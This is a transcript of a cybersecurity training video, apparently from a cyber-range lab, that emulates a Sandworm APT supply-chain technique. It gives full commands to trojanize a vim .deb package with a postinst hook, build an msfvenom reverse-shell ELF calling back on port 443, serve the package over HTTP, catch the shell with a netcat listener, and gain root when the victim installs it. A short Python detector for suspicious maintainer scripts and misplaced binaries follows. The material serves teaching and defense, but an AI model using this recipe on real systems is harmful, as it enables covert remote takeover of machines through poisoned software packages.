How the Sandworm APT group operates

Learn the techniques the Sandworm APT hacking group used to compromise, pivot from and destroy a server. Then try to do it yourself in the Infosec Skills cyber range.

Executing the Sandworm APT with MITRE ATT&CK | Free Cyber Work Applied series

Sandworm APT demo

The edited transcript of the Sandworm APT walkthrough video is provided below, separated into each step Keatron covers in the video.

Who is the Sandworm APT group?

(0:00- 0:22) Hello, my name is Keatron Evans, and I’m going to be showing you the Sandworm APT. This particular exercise and group that we’re going to be emulating here was one of the most prevalent and prominent groups — as far as APT groups — all the way from 2009 up to now. They’re still pretty prevalent. They have a lot of stuff out there going on right now.

Mapping threats to the MITRE ATT&CK framework

(0:23- 0:51) One of the things that we want to make sure we point out is that with this particular lab, as is the case with all of our cyber range labs, it’s mapped directly to the MITRE ATT&CK framework. This deals with client execution and client exploitation, supply chain exploitation, and several others that are tied directly to this specific exercise. So let’s jump right into the lab and get to work with it and let you see how it looks.

Trojanizing a .deb file

(0:52- 2:39) Alright, so one of the first things that we’re going to do here is we’re going to actually trojanize a .deb file, which is basically just an installation file. If you can imagine you’re on your Windows machine, you go download a file from the internet, then you double click and install something. Well, a .deb file is a Debian equivalent of that. And since we’re working with Kali Linux here, which runs on top of Debian, .deb files are the best thing to do that with. We’re going to start off by simply making a directory. We’ll go ahead and open that machine up here and open a prompt. And we’re simply going to make a directory.

root@ip-172-20-6-41:/# mkdir /tmp/work

Then we’re going to cd to that directory that we just made.

root@ip-172-20-6-41:/# cd tmp/

Then we’re going to deep package this Debian file here.

root@ip-172-20-6-41:/tmp# cd /tmp
root@ip-172-20-6-41:/tmp# dpkg -x ~/wim.deb work

One of the key things and one of the things that we really like about the way we design the cyber range is that after you finish each step or each group of tasks, it actually gives you a green checkmark to let you know that you’ve completed that task. This lab might take you 25-30 minutes to finish, so I won’t go through all of it. I’ll save some for you to jump over into the range and play with yourself for the end here. And now we’re going to move on to step two.

Creating the control file

(2:40- 6:19) In this new directory, we will create a file so we can package our application. We’re going to make a directory named work. One of the things I want to point out is we can go back and forth here. You can navigate back and forth between the different machines that you’re working with or the different steps that you’re working on. What we’re going to be doing now is basically creating another directory here, and we’re going to be putting inside that directory an actual file here. Let’s go ahead and open up a prompt. Now we’ve got both machines up and running here. We’re going to go back to our Kali, we’re going to make that directory name “work/DEBIAN” like so.

root@ip-172-20-6-41:/tmp# mkdir work/DEBIAN

And then we’re going to cd to that directory.

root@ip-172-20-6-41:/tmp# cd work/DEBIAN

And then we’re going to create a file here. We’re going to use just a text editor. We can use whatever you want to use as far as a text editor. But we’re going to use nano here. So we’re going to open up “nano control.”

root@ip-172-20-6-41:/tmp/work/DEBIAN# nano control

Since this file doesn’t already exist, you’re effectively creating it when you open it up in nano there. Now, another thing is you could type all the strings out that are in this file, or you could use the copy option here and paste it directly into nano like so. And now you’ve essentially created a file. One of the cool things about the way our labs are set up is if you, for example, didn’t know how to copy and paste something into nano or you didn’t know how to even open nano. Well, there is actually the hint button here. So if you click on need a hint, it actually walks you through more details about what we’re doing. Keep in mind this is an Advanced Adversary Tactics lab that’s mapped to the MITRE ATT&CK framework. So it’s really designed around the concept of having someone with some experience already coming in here and working with this.
However, we’ve built into the experience the ability for even a beginner to get in here and actually eventually get through the lab. They’re going to need a lot of hints. They’re going to have to click on “need a hint” a lot. But it’s there if they want to tackle it and they should be able to get through it. We’re going to go ahead and actually close off this particular file. We’re going to basically tell nano to save this. And now we’ve got our file created. And what you notice is we get the green check to let us know that we successfully completed that part of the exercise.

Creating the postinst file

(6:20- 7:49) In the next step, we’re going to create a post-installation file. We’re going to create this file the same way we did before. We’re going to use nano to create it.

root@ip-172-20-6-41:/tmp/work/DEBIAN# nano postinst

We’re going to take this content right here. And we’re going to put it into this file again.

#!/bin/sh
sudo chmod 2755 /usr/share/vim/addons/update && /usr/share/vim/addons/update

You could type it out, or you could paste it like I did here. Then after you create this file, we’re going to ctrl X to save it. Now again, saving out of it with ctrl X is something that a beginner wouldn’t know because maybe you’re not comfortable or not used to the Linux command line. But we didn’t put detailed instructions like that in here. This is where you’d again, go back to the need a hint or whatever the case may be to figure out how to do those basic things that aren’t really related to the lab. Again, this is us trying to make sure that you can actually get through it. So we go ahead and say yes, to save it. Alright, now we’re going to change permissions. In other words, if we want to be able to execute this, we have to give it the execute permission. And we’re going to do that in Linux with this command right here: chmod.

root@ip-172-20-6-41:/tmp/work/DEBIAN# chmod 755 postinst

And then notice once we’ve done all the tasks in here, that it asks us to do, then it gives us the green checkmark to let us know we’re successful.

Creating the payload

(7:50- 10:31) All right, so now we’re going to go into the steps of creating an actual payload. So the file that we’ve just created will be run after the installation. It’ll execute the file at the specific update location that you see listed there. And then we can create a reverse shell with MSFvenom, which is a tool that we use in the industry to create malicious malware of our own. It’s kind of like becoming a malware author. Now in this particular one, it actually gives you cautionary steps. Be sure to swap out the attacker’s IP with your IP. That way, you’re actually putting something in there that can be made to come back. So first, let’s make this directory:

root@ip-172-20-6-41:/tmp/work/DEBIAN# mkdir -p /tmp/work/usr/share/vim/addons

Alright, we did that. Then we’re going to run the venom command to create the actual executable. What here’s — we don’t necessarily spell this out in detail. But what we’re expecting is that you’re advanced enough to realize that, okay, we have to change the attacker IP part here to be our IP, because that’s what the instruction said. Now this again, opens up another part of where you have to be a little bit beyond basic because you got to realize, Okay, I got to go and actually check and see what my IP is. In my case, my IP is 172.20.6.41. So I need to go ahead and put that in there. In that command, in lieu of just saying attacker IP, I need to put my actual IP there. And that’s what this note is telling you up here.

root@ip-172-20-6-41:/tmp/work/DEBIAN# msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp LHOST=172.20.6.41 LPORT=443 -b "\x00" -f elf -o /tmp/work/usr/share/vim/addons/update

Now, again, show hints can help you and even if that doesn’t help you enough, what you can do is if you look at the screenshot, you can see that first we check to see what our IP address is. And then you can see the order in which we did the commands here to actually make this work.
The last step is to actually run the venom command to create the malicious binary. So we execute that. And you have to be patient and give us a minute as it’s going through and doing these things.

Found 4 compatible encoders
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=17, char=0x00)
Attempting to encode payload with 1 iterations of generic/none
x64/xor succeeded with size 199 (iteration=0)
x64/xor chosen with final size 119
Payload size: 119 bytes
Final size of elf file: 239 bytes
Saved as: /tmp/work/usr/share/vim/addons/update

Now you can see it created our malicious file, and it says that it created that binary, saved it to the location: /tmp/work/usr/share/vim/addons/update. Notice when I finished all those steps, it actually then gave me the green checkmark and said “You’re good to go. You’ve created your malicious file.”

Preparing the package

(10:32- 13:19) Now we need to actually prepare the package. When the malicious app is installed and the reverse shell should be sent back to us, we need something that can actually grab that connection as it comes back. So to do that, what we’re going to do is set up a Netcat listener. The first step we’re going to do is actually cd to the temp directory.

root@ip-172-20-6-41:/tmp/work/DEBIAN# cd /tmp

Alright, and then we’re gonna do a depackage right here.

root@ip-172-20-6-41:/tmp# dpkg-deb --build /tmp/work
dpkg-deb: building package ‘vim’ in ‘/tmp/work.deb’.

Then we’re going to CD.

root@ip-172-20-6-41:/tmp# cd
root@ip-172-20-6-41:~# mkdir dist

Then we’re going to do a move command. So we’re going to move the .deb file that’s in work to this other location here.

root@ip-172-20-6-41:~# mv /tmp/work.deb ./vim.deb

Then we’re going to run this Python command here to start to basically run this HTTP server.

root@ip-172-20-6-41:~# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) …

Now it’s listening and serving stuff out of this directory on port 80. And then in a different terminal, we’re going to run Netcat. They note here that you’re in a different terminal because if you try to run it here, you’re going to kill the little web server that you just launched. So we have to go over to a different terminal. We’ll use a second one that I pulled up earlier to check my IP. I’m going to now have Netcat listen on port 443.

root@ip-172-20-6-41:/# nc -nvlp 443
Listening on 0.0.0.0 443

And notice again, when I’ve completed all those tasks, it gives me the green thumb. Now one thing I want to point out is when I did the steps of creating the Debian work directory and running venom, notice I didn’t particularly run them in the exact same order that it is in the screenshot, but I still got the green checkmark.
This is because we’ve built these environments, so it’s really checking to see that you get the task done, not so much that you typed the exact command a certain way, because that’s really not how we learn anyways. So as you can see here, as long as you get the steps done, the order that you did them in didn’t necessarily matter. Now, for some exercises, the order will matter. But in this one, we just wanted to make sure that you got all the things done.

Triggering the exploit

(13:20- 15:08) Then we move on to the next step where we’re going to trigger the exploit. To do that, we need to switch over to the victim machine or the target. So we’re going to go to our target here. I’m gonna do a wget, go to the student machine, which is the Kali machine that we’re just working on, and bring down this .deb file.

admin@ip-172-20-16-231:~$ wget student/vim.deb

Notice it says that it successfully brought down and saved that file for you. We’re going to depackage that .deb file. This would be the same as if you installed a file if this were a Windows environment, for those of you that are more familiar with Windows. We go ahead and paste that command to do that depackage.

admin@ip-172-20-16-231:~$ sudo dpkg -i vim.deb

And we can see it depackaged and installed. Now what you want to look for is if you go back to the original machine, where we’re listening, you will see that there is now a connection that came back from the other side. So now we can actually run commands on that victim machine as you can see right here. And if we do what it says in the instructions, we come over here and do ID. It actually shows us that we’re running as root and from that point, we own this box. We can run any root privilege level commands that we like, and what you just saw there was exactly one of the techniques that are used by the Sandworm APT group to do these types of things. And this maps nicely to four or five different MITRE ATT&CK framework pieces there.
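The package built in the steps above has two tells a defender can check for before running `sudo dpkg -i` on something fetched from an untrusted host: a postinst that chmods a file the package itself shipped and then executes it, and an ELF binary dropped under /usr/share instead of a binary directory. The audit below is an added example, not code from the video or the lab; it assumes the package has first been unpacked with `dpkg-deb -R pkg.deb DIR` (control files under DIR/DEBIAN, payload under DIR/usr/...), and the pattern and directory lists are my own assumptions, not an exhaustive rule set.

```python
import os
import re

ELF_MAGIC = b"\x7fELF"
# Where a legitimate package normally ships executables (assumed list).
BIN_DIRS = ("bin", "sbin", "usr/bin", "usr/sbin", "usr/lib", "usr/libexec")
# Maintainer-script patterns worth a second look (assumed, not exhaustive):
# setuid/setgid chmod, chmod chained into running a shipped file, network fetches.
SCRIPT_PATTERNS = {
    "setuid/setgid chmod": re.compile(r"\bchmod\s+[2467]\d{3}\b"),
    "chmod-then-exec chain": re.compile(r"\bchmod\b[^\n&|;]*(?:&&|;|\|\|)\s*/\S+"),
    "network fetch": re.compile(r"\b(?:curl|wget|nc)\b"),
}

def audit_maintainer_script(text):
    """Return (label, line) pairs for suspicious lines in a preinst/postinst script."""
    findings = []
    for line in text.splitlines():
        for label, pattern in SCRIPT_PATTERNS.items():
            if pattern.search(line):
                findings.append((label, line.strip()))
    return findings

def audit_payload_tree(root):
    """Flag ELF files the package installs outside the usual binary directories."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if rel.startswith("DEBIAN"):
                continue  # control files are handled by audit_maintainer_script
            with open(path, "rb") as fh:
                is_elf = fh.read(4) == ELF_MAGIC
            if is_elf and not rel.startswith(BIN_DIRS):
                findings.append(("ELF outside binary dirs", rel))
    return findings

def audit_extracted_deb(root):
    """Audit a tree produced by `dpkg-deb -R pkg.deb root`; returns every finding."""
    findings = []
    for script in ("preinst", "postinst", "prerm", "postrm"):
        path = os.path.join(root, "DEBIAN", script)
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings += [(f"{script}: {label}", line)
                             for label, line in audit_maintainer_script(fh.read())]
    return findings + audit_payload_tree(root)
```

Against the package from this walkthrough, the postinst line trips both chmod patterns and usr/share/vim/addons/update trips the ELF check; a package with only a stock `update-rc.d` call in postinst produces no findings.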

Try this cyber range yourself

Thank you for watching. If you want to do this exercise just like what I just showed you — and complete it — then head on over to our free cybersecurity training resources page and create your free account. You can find this particular exercise in the Advanced Adversary Tactics Cyber Range. Thanks for watching.